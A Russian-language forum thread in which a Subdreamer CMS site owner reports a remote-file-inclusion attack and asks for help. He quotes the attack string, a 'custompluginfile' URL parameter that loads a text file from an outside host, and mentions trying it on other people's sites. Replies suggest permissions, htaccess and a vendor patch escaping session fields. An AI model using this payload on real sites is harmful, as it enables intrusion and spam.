Обнаружена уязвимость.

[golodenko]

Суть в чем:
Кто-то каким-то образом использует возможность присоединять текст из постороннего источник к плагинам.

//?custompluginfile[]=http://www.campus.it/media/Shaun$.txt

И рассылает спам.
Я попробовал эту строку добавить на несколько других сайтов — там не было результата. А на моем появляется форма отправки сообщения.

В чем может быть проблема? Спасите.

Простите за ламерскую формулировку.

 

[duncan]

Я попробовал эту строку добавить на несколько других сайтов

ггггг...

В чем может быть проблема?

странно, последняя уязвимость была ещё ого-го когда....
не уверен -- но может права на папки\файлы у вас установлены слишком вольготные?...

 

[golodenko]

ггггг...

Я же извинился )

странно, последняя уязвимость была ещё ого-го когда....
не уверен -- но может права на папки\файлы у вас установлены слишком вольготные?...

Проверю.

Смотрите я что думаю. При создании плагина есть пункт "из файла". Этот пункт видимо предусматривает ссылку на удаленный файл. Как можно отключить эту строку? Или запретить доступ к удаленным файлам для плагинов?

 

[duncan]

Или запретить доступ к удаленным файлам для плагинов?

ну, может, с помощью htaccess ограничить доступ к директории?..

 

[duncan]

как накаркали...

рекомендовано обновиться до версии: Subdreamer CMS Pro 2.5.3.3
необходимо обновить два файла:
1. includes/usersystems/phpbb3.php
2. includes/usersystems/ipb2.php
для PHPBB3, строка 701 of includes/usersystems/phpbb3.php:

$session['session_ip'], $session['session_browser'], $session['session_page'], $session['session_viewonline'],

заменить на:

$session['session_ip'], $DB->escape_string($session['session_browser']), $session['session_page'], $session['session_viewonline'],

для IPB2, строка 215 in includes/usersystems/ipb2.php:

$DB->escape_string($session['ip_address']), $session['browser'],

заменить на:

$DB->escape_string($session['ip_address']), $DB->escape_string($session['browser']),